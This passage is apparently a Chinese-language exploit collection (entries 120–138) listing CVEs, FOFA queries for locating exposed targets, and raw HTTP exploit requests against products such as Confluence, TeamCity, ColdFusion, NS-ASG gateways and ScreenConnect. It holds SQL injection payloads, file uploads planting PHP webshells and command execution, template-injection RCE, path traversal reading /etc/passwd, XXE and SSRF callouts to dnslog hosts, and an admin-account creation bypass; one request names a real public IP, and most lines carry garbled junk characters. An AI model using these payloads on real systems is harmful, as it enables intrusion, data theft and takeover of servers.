' p& C9 {) l# yCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee7 g; Y: h; Y9 Y8 x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
# u( d+ [1 J9 l/ m, b# sAccept: */*: Y  Q6 Q& W9 m1 }. I# C5 u% X. d# `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
( a) O5 \' w" c9 r! W( K1 [  y! ]Accept-Encoding: gzip, deflate
& _  i, P1 b: c: w/ }Content-Type: application/x-www-form-urlencoded;7 I, A; d0 o+ ^
Content-Length: 109
' H0 m9 ?; u) k5 c# F9 XOrigin: https://58.18.133.60:8443
  G7 H" K$ f1 m. y7 sReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php
8 |  ^( ]( }- u% g! p9 ~Sec-Fetch-Dest: empty5 t3 e9 Q6 _5 ^. G6 S5 e* F  R6 k( q
Sec-Fetch-Mode: cors+ }( n' g2 k5 D% r8 q. Z
Sec-Fetch-Site: same-origin
" c/ V! v( B9 \# T. }0 i; i1 TX-Forwarded-For: 1.1.1.1, d5 t2 ]4 F, @6 f9 g
X-Originating-Ip: 1.1.1.1
6 N7 ?+ h. |! ]% c3 eX-Remote-Ip: 1.1.1.1
, a2 A! I/ D8 ~2 d) _) t1 RX-Remote-Addr: 1.1.1.1
1 s/ I: b2 _  ?" T$ I2 l* GTe: trailers
) q+ I+ o2 a: V9 @Connection: close6 ]/ P+ j* n" |9 Z  s

. K" ^: n+ o0 N2 M" G4 Osrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456" L6 E4 x; n/ u
! L, |2 p/ I2 W8 f/ ^% P
$ a% w7 b: k' W5 T+ g$ f
120. 北京百绰智能S40管理平台导入web.php任意文件上传. H* T, e  r$ V6 s7 b# n, \+ |
CVE-2024-1253
7 B' E7 t! r( f% b! FFOFA:title="Smart管理平台"+ P) |& r5 `" [+ w& W$ A4 B
POST /useratte/web.php? HTTP/1.1
+ Z* [* `5 R4 h9 {8 YHost: ip:port/ l+ G4 s( W+ ]
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db2 n2 q6 T- c. M- Y
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
; Z; S; c& H6 T+ {4 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( |- {$ `2 l" r  n; B% `9 u3 h3 GAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+ i0 N7 x7 Z0 k5 Q  _) z; oAccept-Encoding: gzip, deflate
& W* S1 Z3 I' B( I5 {Content-Type: multipart/form-data; boundary=---------------------------423289041236658752706300793288 A8 _/ {7 }3 s
Content-Length: 597
, O* g( S, u- B% L% b  o3 tOrigin: https://ip:port
4 V. E# l3 K# Q7 p6 F" KReferer: https://ip:port/sysmanage/licence.php5 k) A  F; a: t4 {# E
Upgrade-Insecure-Requests: 1
/ W7 m8 n; N& A$ h' k* H, ISec-Fetch-Dest: document/ A+ K1 P' w  |% r
Sec-Fetch-Mode: navigate$ H' |# h& q) z# q7 m9 l8 I
Sec-Fetch-Site: same-origin$ J* R5 ~# j0 T. ~" y8 f" c7 y
Sec-Fetch-User: ?1
0 H; z: x; Q4 QTe: trailers' a6 c8 O+ t2 O2 E* g% I1 h7 E* T; b
Connection: close
9 O6 V0 B# T* Q0 R
1 e( j* K6 @& ?( W3 H# V-----------------------------42328904123665875270630079328
% K6 E9 x, b$ k) i! ZContent-Disposition: form-data; name="file_upload"; filename="2.php"  x, D( {) L7 [2 t+ X* ^" g
Content-Type: application/octet-stream
6 q8 o) p6 c+ y( |+ J) h, }8 V1 ?$ `5 a1 \
<?php phpinfo()?>
- c, e! I+ `0 Q& r4 n+ ^- m$ R-----------------------------42328904123665875270630079328% R* y+ ~9 G/ I5 \9 v2 {9 s
Content-Disposition: form-data; name="id_type"
" E! d& D9 A  W6 d' X6 S) B7 l2 q' g* w1 Y, R
1  Y6 u* g0 f( M# ?
-----------------------------42328904123665875270630079328
- Z  V) @( t& _$ O- M6 t- B: OContent-Disposition: form-data; name="1_ck"2 ^/ R/ v+ }0 }6 B4 h

6 Y* w  k2 a6 H6 f1_radhttp
3 a! @4 M3 _$ m7 J. q" U  e-----------------------------42328904123665875270630079328
4 Y0 u7 W6 n# fContent-Disposition: form-data; name="mode"
/ T  B3 ~: l9 \4 v# f
, \% M% q9 P7 w3 m8 oimport: z; A9 v! _+ s2 N7 |0 u% @
-----------------------------423289041236658752706300793285 ]8 Y4 X7 G0 s# J. Y8 P3 v
9 O) Y% }2 c" x) E9 I

2 Z9 |) T  w6 ?9 b9 X( H9 \文件路径/upload/2.php( u, J1 D- T9 R( g7 E$ G, @
$ z% M' A- B% @- S- @6 a" V
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
' C$ g2 |/ D/ ]& s7 d& O1 [) nCVE-2024-1918
9 Z. h2 ?" a" j. g  x, [. [: yFOFA:title="Smart管理平台"
9 d4 F% \, d( S+ mPOST /useratte/userattestation.php HTTP/1.1
6 }  w, o) T; p0 p* PHost: 192.168.40.130:8443
# E4 r$ B7 w% R1 e- n1 zCookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac504 s! @) g2 A& G
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko! |  s+ O2 {/ U2 Y( v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, o5 @' P2 h+ `' j, ]4 A% Z! H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, A; q0 s5 U' A9 o$ R6 ^2 X, XAccept-Encoding: gzip, deflate" H$ P' n1 v* a( c% b; ]$ K
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
: b% v7 q/ ^* f% s" a) b- eContent-Length: 5923 @9 d$ g. [9 \% r8 d3 Z
Origin: https://192.168.40.130:8443" l" l  ?, h+ w  g( J3 }& J
Upgrade-Insecure-Requests: 1
8 A2 O- g$ f7 PSec-Fetch-Dest: document
( z* K- ^+ K/ j, Y9 }2 g+ O/ SSec-Fetch-Mode: navigate
% t$ \$ `2 G  V+ A; [Sec-Fetch-Site: same-origin
+ m& Y# \. H/ W( hSec-Fetch-User: ?1
9 ~8 o8 G6 ?, _  h! c6 B' ^Te: trailers7 G/ O7 g, U" M( U: D+ C2 P
Connection: close/ ?1 s  d0 ~0 s% o5 L+ q6 G

- g0 R, u& X% v; W7 u* ^  O* Q-----------------------------42328904123665875270630079328
8 @- v* R& S/ C6 bContent-Disposition: form-data; name="web_img"; filename="1.php"
# z% A9 E! Q. ZContent-Type: application/octet-stream
4 \$ t6 X& R. d7 n* B0 U. r
, o- p$ V/ T& K1 ?9 u; N/ P<?php phpinfo();?>. l* a; B) |( O. a! C( M# L
-----------------------------42328904123665875270630079328' {+ s; b" g1 ^& Y
Content-Disposition: form-data; name="id_type"
; q6 \7 C6 a2 E  f  N
2 x1 s4 p5 E' [% T* y! z& ?! v# @1+ V, ~; o- N. l/ W4 `4 Q
-----------------------------42328904123665875270630079328
! c5 q3 D  |$ M& pContent-Disposition: form-data; name="1_ck"
0 p3 e1 G5 x6 U. l* `3 Z6 Z9 P! |8 G  C% }7 `! _6 ?* t
1_radhttp: e% `. Q9 X9 S4 f) X7 S, }2 v
-----------------------------42328904123665875270630079328
+ |/ t. ?/ m7 f5 }3 C# t! E2 L& u* \Content-Disposition: form-data; name="hidwel"+ G+ J( Y: i, W/ o3 B

) D- T) y, z4 {* j' x: zset  Y2 Q: y  h, ?
-----------------------------42328904123665875270630079328
0 O! s, w4 p1 a$ b4 j2 h7 {
$ q0 X# f& J; _) ?; u' y7 e, G+ V; |
boot/web/upload/weblogo/1.php
) U/ j9 e$ \' [5 R% G0 _5 i
2 [4 q1 f8 e+ Z7 {" D122. 北京百绰智能s200管理平台/importexport.php sql注入1 Y% ?' x  y8 l1 R, `
CVE-2024-27718FOFA:title="Smart管理平台"
7 @, U7 ~1 v2 }1 {其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
' F7 ]# q6 h7 J) {GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1& \. ~' v, T4 V/ m
Host: x.x.x.x  _" R. s3 x) m) _
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0) \  D2 z1 j. b2 x, Q- z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0) ^' U: Y& D. A) ~2 i: z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8# N5 N, {0 O# J' j
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
9 i4 h/ t& n4 Z7 N8 @3 o; T( h9 UAccept-Encoding: gzip, deflate, br
  Z  _9 N* T* j; h/ \: G' `9 _, P/ TUpgrade-Insecure-Requests: 1% R* l/ K# N7 o( l* s5 C8 `
Sec-Fetch-Dest: document
- b) P4 J+ x: R8 q+ e% rSec-Fetch-Mode: navigate
) n9 i( G0 J4 a$ F5 ~  cSec-Fetch-Site: none
8 Y+ F3 c3 N  w& Z9 O, QSec-Fetch-User: ?1
: U/ c6 w, ^( [Te: trailers
+ u. r! W; I5 A% c+ _. SConnection: close
+ k  V4 `2 @/ y) {  G( T$ ^9 [. L* T8 ?0 h) Q2 S
7 z3 i3 F3 M$ b6 g1 _% J! Z5 W( |
123. Atlassian Confluence 模板注入代码执行% A# U- f' E) v) M* U
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"; W) P6 a1 ]8 t& q0 o; K: |9 m; v/ [
POST /template/aui/text-inline.vm HTTP/1.1, {" J6 D6 o1 ]. x# B
Host: localhost:8090
( k; F2 I8 P  m7 F, Q1 N4 FAccept-Encoding: gzip, deflate, br
* p0 V! {5 E6 Q1 P: l7 u; BAccept: */*
) Z" G6 J: I/ O: c  C' pAccept-Language: en-US;q=0.9,en;q=0.8+ K) t) ~0 O1 b, w7 K  b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.368 |. V1 l3 x6 z
Connection: close3 c. N) T, O3 _0 L/ D- J6 c" {
Content-Type: application/x-www-form-urlencoded
7 F$ x0 k* y8 l: y; T* n/ h% e( Y* p: b, c$ }
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))
  Y" {" l+ D6 o
$ q9 Q" w" y: l6 G* j& _) K1 u2 i+ g
3 X- m+ ?) S9 g& {124. 湖南建研工程质量检测系统任意文件上传' v, ]8 A/ m, X2 Y0 |6 F
FOFA:body="/Content/Theme/Standard/webSite/login.css"
- `$ Z0 P: s, F/ D  s% I( i# X  b4 KPOST /Scripts/admintool?type=updatefile HTTP/1.1
& A1 H4 n6 `! l: qHost: 192.168.40.130:8282
; T: ^) P# W9 _User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36. I$ L& W8 f2 w: A. h
Content-Length: 72
0 s+ s" Z- N1 |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
' w# ]9 }3 `& E" w& BAccept-Encoding: gzip, deflate, br
/ A( x2 C* V0 b' U% DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 s  K) S$ A4 _# }# c! a
Connection: close' r3 X5 H; I, m
Content-Type: application/x-www-form-urlencoded/ m# h  p4 h* }" F6 I7 ~% R0 W
+ H$ F/ D* x6 e8 e
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
$ ]  t- \: T$ `
" e6 \- L. F# T8 V3 W3 K2 \, O: n% D( {, w2 C
http://192.168.40.130:8282/Scripts/abcgcg.aspx
; P- y& n2 x* {
: ?% C4 q2 T5 u7 _. z% s; w125. ConnectWise ScreenConnect身份验证绕过; v  m  n7 e! \! W8 L0 n
CVE-2024-1709
- \3 i% b4 ^- F& z& s- V( ?2 L; `FOFA:icon_hash="-82958153"
( I' Y  c' _# G/ \; R! h% l. chttps://github.com/watchtowrlabs ... bypass-add-user-poc
5 Y. _0 T* N  Q, Y# W7 l( k/ o' a: I! K3 O" G8 D
1 [9 p+ d3 _3 J# u
使用方法
, M% y9 w' Z$ n5 t$ w7 {; u) Gpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!, H. f% {: o6 F  v, J& }/ D1 p
  ?( w6 u, U) \- h, ]2 e! p

5 D, ]4 B, Z) y7 p创建好用户后直接登录后台,可以执行系统命令。3 k" z/ \( U0 M/ t' K

6 u( a% S$ t) M- U126. Aiohttp 路径遍历  L4 D7 Z  O; e2 w
FOFA:title=="ComfyUI"
6 W9 ~6 B* `8 z/ ?GET /static/../../../../../etc/passwd HTTP/1.1
/ N! J3 e9 r! t' hHost: x.x.x.x. C# G7 e& s- u  J) y- N) M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
; r! H0 B4 k0 `1 p, I- B0 `Connection: close! ^, `2 n) R& [0 H5 c. d
Accept: */*
7 O  ~+ Z5 Y* d5 v) dAccept-Language: en3 W+ O' H: @5 `
Accept-Encoding: gzip8 t5 y( S/ |+ A9 t6 V
: v) g& l, `" D
2 F* z) o% o, r8 J& L3 `
127. 广联达Linkworks DataExchange.ashx XXE
5 Z$ U' n+ W8 V9 N7 ]FOFA:body="Services/Identification/login.ashx"
7 F/ a( T7 g+ c# oPOST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
& ?5 f; I: L( s; G. P) g  sHost: 192.168.40.130:8888& m7 N4 j  @* c' H6 ?7 ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
5 k1 q$ |. T3 N. A0 xContent-Length: 415
% j4 b+ A) U, u1 J, MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 n# w$ n5 G: j! E9 h
Accept-Encoding: gzip, deflate( R8 y% N# N0 ^" p' `+ S7 W9 c
Accept-Language: zh-CN,zh;q=0.9
& h. d5 l+ T0 t; c% Y0 ]0 u8 X  `Connection: close! y, I0 @$ i% M* x- x9 E! v& o1 l, \
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe05 N4 G6 H/ d$ y5 A2 h
Purpose: prefetch. G2 `  N0 a, ]  V, [. w
Sec-Purpose: prefetch;prerender
) x, H' H/ m0 c. Z' l( n3 D* ?3 M
------WebKitFormBoundaryJGgV5l5ta05yAIe0
2 p# F& \2 @, z% V) m; K6 j+ eContent-Disposition: form-data;name="SystemName"5 _; c; m  v2 x7 Q' V
2 Q$ ?: v, m2 w0 L5 p7 E
BIM
- X' [0 f8 `8 d9 p8 z------WebKitFormBoundaryJGgV5l5ta05yAIe0( k6 e  [2 e, @7 Z8 b# x4 X/ m3 W
Content-Disposition: form-data;name="Params"7 h  g: F/ q5 w: Y0 r' P  m4 ^
Content-Type: text/plain
# l9 e) p/ E( ~: w, }8 ?+ W3 D8 w7 }1 U5 o8 D
<?xml version="1.0" encoding="UTF-8"?>
. A* T- m1 r; a+ Q/ K3 X<!DOCTYPE test [
; S, }0 y( y6 K2 e, M<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
# K/ a- x; |+ s6 y& t3 a) K; o! L]7 w. Q/ m+ W! h: [: _& x
>
  ^/ v% s: g+ e/ F1 V9 K  @1 {<test>&t;</test>
) f' A. ]" w5 v: W, T------WebKitFormBoundaryJGgV5l5ta05yAIe0--
0 ?( h; [4 h4 K) p4 C7 ?; o/ w, F& S' ~

- B, Z2 M/ h% D) A7 H/ x
. Q* k! G% Y. i* A2 Q1 k- r128. Adobe ColdFusion 反序列化
2 O& a( q* U" B9 w* R4 o) h: i7 rCVE-2023-38203+ k# C8 s' }' H9 H( t
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)- U2 Y. |% s3 B" r, F$ G  N0 d
FOFA:app="Adobe-ColdFusion"; ?# _1 R- F$ p7 T, P
PAYLOAD+ _" z3 x3 D0 Q7 g

6 L. l$ P1 [* c( Y3 [; P  Z129. Adobe ColdFusion 任意文件读取& h3 H( r' `; s4 {/ }1 R
CVE-2024-20767
4 V. w! A/ Y- O" `; Y8 vFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"* S+ e2 S, U/ M0 h1 f
第一步,获取uuid
% V  I, g$ C& r9 @GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.16 [' I  d6 h8 l- q$ r
Host: x.x.x.x. o! w2 g  f. B9 X9 e2 ~) `. N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
" {& _/ z% `7 j* W* y4 K1 b4 M8 RAccept: */*
. o- F' J& V- a* W% i. tAccept-Encoding: gzip, deflate, h/ _' |: @7 J& p' P
Connection: close
8 G% f% t: `  a5 G8 I, s7 w, ~* Y; M
& m* O- w5 V; M/ ]+ B! w( C- h  n( G
第二步,读取/etc/passwd文件& n' m+ @2 h( y/ O! e! \
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
6 @9 _7 P! q# O( m- }# MHost: x.x.x.x/ y) y! i5 E; m' e7 ~
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
6 p9 s$ p% Y; K2 ~( d. cAccept: */*% P! v/ K4 V1 n
Accept-Encoding: gzip, deflate# |9 Q2 o  c3 j& c  w* z
Connection: close% B) F9 M/ v2 E- f. [
uuid: 85f60018-a654-4410-a783-f81cbd5000b9: C1 o8 c7 i2 |# X  ~9 @
: k$ E# d4 L$ h& I
: ]  b3 v* L; g+ Q+ r% P# m0 T; {+ y7 x5 q
130. Laykefu客服系统任意文件上传! o( m5 ^2 V7 E, Q: C
FOFA:icon_hash="-334624619"4 S4 z! |5 k* y8 R- ]1 E
POST /admin/users/upavatar.html HTTP/1.1  h7 L- z3 R, Z/ |  H
Host: 127.0.0.1! T2 v* c! H" h! G/ H# J
Accept: application/json, text/javascript, */*; q=0.017 {! o& ~7 Q: a8 V
X-Requested-With: XMLHttpRequest
) s+ K$ J: Y2 y: n8 G! ~User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26% p, `% x8 A& h1 t: i
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
$ Y0 U$ x- e) g% e2 u0 XAccept-Encoding: gzip, deflate8 A9 O( F) e4 b
Accept-Language: zh-CN,zh;q=0.9
0 M2 t1 e' u) u# E) r2 x/ y+ mCookie: user_name=1; user_id=3) d: a% U0 V/ J' l5 ?& F$ Z' h
Connection: close
% r' o: Q! a  c1 s6 C( I4 m6 T6 q. y* V
------WebKitFormBoundary3OCVBiwBVsNuB2kR
- B2 ?) U* L6 f& ]1 b$ zContent-Disposition: form-data; name="file"; filename="1.php"
/ W& U* S1 S9 |! z7 }- pContent-Type: image/png
. I4 b% \$ X& ~7 l5 Y4 b
" z$ T* E4 z/ v) |" u, K: V. _<?php phpinfo();@eval($_POST['sec']);?>; V2 H, }" u& [. u
------WebKitFormBoundary3OCVBiwBVsNuB2kR--, C7 s2 u. T" u1 p% L; U7 x8 e
7 F9 a7 o3 [& W" b# Q$ r/ {
7 h: r8 w& E+ {) q9 Q
131. Mini-Tmall <=20231017 SQL注入
, W) R. ~# i* yFOFA:icon_hash="-2087517259"# X: w) `! O7 i$ f) h; g4 e
后台地址:http://localhost:8080/tmall/admin# v) l0 f; o+ U# j6 i
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
2 B* p; i3 z  T. t, U+ T1 q( Y# t- u( r1 c
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
4 h2 M4 j+ M) o9 ~! ^$ M- I) uCVE-2024-27198- G$ `9 E' {# o; t5 i! r" q
FOFA:body="Log in to TeamCity"
: r' u. D8 M- oPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
# S# [) s; a  ?! d1 z' YHost: 192.168.40.130:81119 M  p% ?" h# v4 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36: i6 m  g# n2 W
Accept: */*
4 d; F3 Q; H6 l: ~Content-Type: application/json
9 F& e: t, x4 WAccept-Encoding: gzip, deflate* p2 I% [, q* W, w

. h& V# o" K; U9 `  c0 W0 D{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
2 C; l; D% ?+ |. I, E0 N5 L' a+ Y& h/ y
7 Q! F7 t& e  y# q) K8 W% X
CVE-2024-27199* x. X) r1 X  q% u) E$ ?& n+ c7 m
/res/../admin/diagnostic.jsp" W3 h9 r" B/ S* w
/.well-known/acme-challenge/../../admin/diagnostic.jsp4 c2 B; o/ J6 [) g% E8 a
/update/../admin/diagnostic.jsp
) K2 H( r! W  I7 d* }
2 |. ]& {  g2 }. W" E" U
( T2 w) E% @: u$ BCVE-2024-27198-RCE.py
( W* l$ m* a. C4 O* h  Z
* F( v% F( B$ K) b133. H5 云商城 file.php 文件上传
5 J- Z. d- _# b4 L8 uFOFA:body="/public/qbsp.php"
# v/ Z, `" c, J3 t1 e8 \0 D4 hPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1- a8 P* k, Y! ^5 y* U4 y/ y
Host: your-ip
6 n& ^5 g8 c9 H9 B$ ~2 KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
% W0 A, m7 |0 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx( s% H; b. w1 T9 P$ e& Z9 u

% K1 l, S& S  i4 n8 [! k: V* w: R------WebKitFormBoundaryFQqYtrIWb8iBxUCx! S& X4 {' \) S& }$ D
Content-Disposition: form-data; name="file"; filename="rce.php"
% M8 u/ z: y1 C7 G/ _. N0 A8 ~8 Q9 ?Content-Type: application/octet-stream
1 O* Q. ]7 F  b+ k
9 p; Y7 Q) t7 r; r' a5 g<?php system("cat /etc/passwd");unlink(__FILE__);?>! _+ t9 m! Z8 @5 ]+ e9 y" K
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--! M$ |1 d5 t( ^# g# |! j

2 w' k6 x0 P" _, o. F& h8 s1 j. @
2 |" |8 ?7 e  g
# c1 s* H2 s+ v& b, E134. 网康NS-ASG应用安全网关index.php sql注入! @5 a. L- J9 Z# ?; g
CVE-2024-2330
( H. }* \; L, x2 V- }3 hNetentsec NS-ASG Application Security Gateway 6.3版本
0 ~, {4 R+ d9 LFOFA:app="网康科技-NS-ASG安全网关"
9 ]/ @) }* e- ^POST /protocol/index.php HTTP/1.1! A+ B. N; q/ Q% w4 Z4 N
Host: x.x.x.x  K& `2 H7 V- F1 D" m% x$ g/ H
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
- Q0 h5 w- s4 q  JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0/ _! }) ~* M( v; ]1 s
Accept: */*& a# [; C' F+ c# j! p2 Y! H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; N; P6 w$ Z5 n) ?' y5 P+ @6 w
Accept-Encoding: gzip, deflate
; D* N. X" R, i* g; cSec-Fetch-Dest: empty5 v' N# Z; G' z' y' v
Sec-Fetch-Mode: cors) E9 B- Q' m6 [/ ?8 C
Sec-Fetch-Site: same-origin: c+ T5 V. ?* f- Q/ k! K' x( y
Te: trailers
; |6 f# m) q7 LConnection: close
+ r3 O9 W' R4 K- X% v" l8 A! @Content-Type: application/x-www-form-urlencoded: {# z- D5 ?" c
Content-Length: 263
/ ^. c* V& ~3 V2 @; s9 ^, o3 ]0 D5 e; H( ?# K2 Q
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}
. n$ @4 i7 j$ o7 p* m
; l- B% G3 K, t. h
, e  W1 q+ i0 o% k6 s  @135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) ?) m: O' C* Z9 l
CVE-2024-2022
. C( Y) n. k1 WNetentsec NS-ASG Application Security Gateway 6.3版本
1 D; T- L/ _* U8 H9 M( m; M+ ]2 TFOFA:app="网康科技-NS-ASG安全网关"
$ B$ s( h: k' ]: OGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
5 E8 H6 h- R6 U, e% S& M) ?Host: x.x.x.x& {2 D! M! t1 s/ N$ Y  B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
" x. S, }: U8 c6 G: n% }3 I& tAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* G# v8 ]4 N4 x" F, h
Accept-Encoding: gzip, deflate
( ?2 b7 h7 s' OAccept-Language: zh-CN,zh;q=0.9
7 r: [# Z. L9 O! G: @Connection: close/ l% r$ m0 _  u9 u& g+ N

/ W0 Z# I+ s2 X; h7 x" [2 x9 \# X+ ~: w* q
136. NextChat cors SSRF7 i2 \% o( W8 Z4 H/ O  u; `
CVE-2023-49785' U6 h  q5 E, [: B1 c  S+ B0 z
FOFA:title="NextChat"
7 W! l/ z  ?9 \. P# d2 L. m7 FGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
4 m. f5 x: }5 V2 ^+ HHost: x.x.x.x:10000
; O$ Q+ T4 p: Y' kUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ K3 T, u& L  l7 l+ Y% ~( w& Q+ dConnection: close
9 ^6 u& f8 d( t* k- FAccept: */*  M, E, k( Y" P, }3 h1 c) ^3 h
Accept-Language: en+ a1 w+ R: z% S" ~. u
Accept-Encoding: gzip
6 t$ q0 |* E$ S) r7 Y  y' r/ H) H- b+ ^2 o& ?3 v/ [% K
/ M  {9 ?  C" N. h2 V# U) c
137. 福建科立迅通信指挥调度平台down_file.php sql注入
& g- ?, v2 D1 x: M& \- m0 \0 @7 \CVE-2024-26208 X8 g  ]+ }9 G! n, c/ v! }
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
' K- X8 `% k8 a, O0 l* }' yGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1* L7 d0 N5 K) Q# C4 E+ Z8 i
Host: x.x.x.x% A. @$ t9 r9 H- g- E' P* e2 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ k' w. E& B1 c) G4 X
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 W1 Y" |. h" x5 N9 `
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, ?/ ^1 S0 r, E2 d" D2 @; r2 fAccept-Encoding: gzip, deflate, br( m- L" A; U4 X6 g' Y
Connection: close( ~, t& z0 r) F& d9 l9 O
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj4 b" L! A/ g" t/ N3 J% W: V
Upgrade-Insecure-Requests: 1; ]# ?% X% C$ H3 k

! }7 f; q" E* n/ N; z
( E, n7 \5 C2 }9 R* }138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
2 f6 p7 I% q% E) `CVE-2024-2621
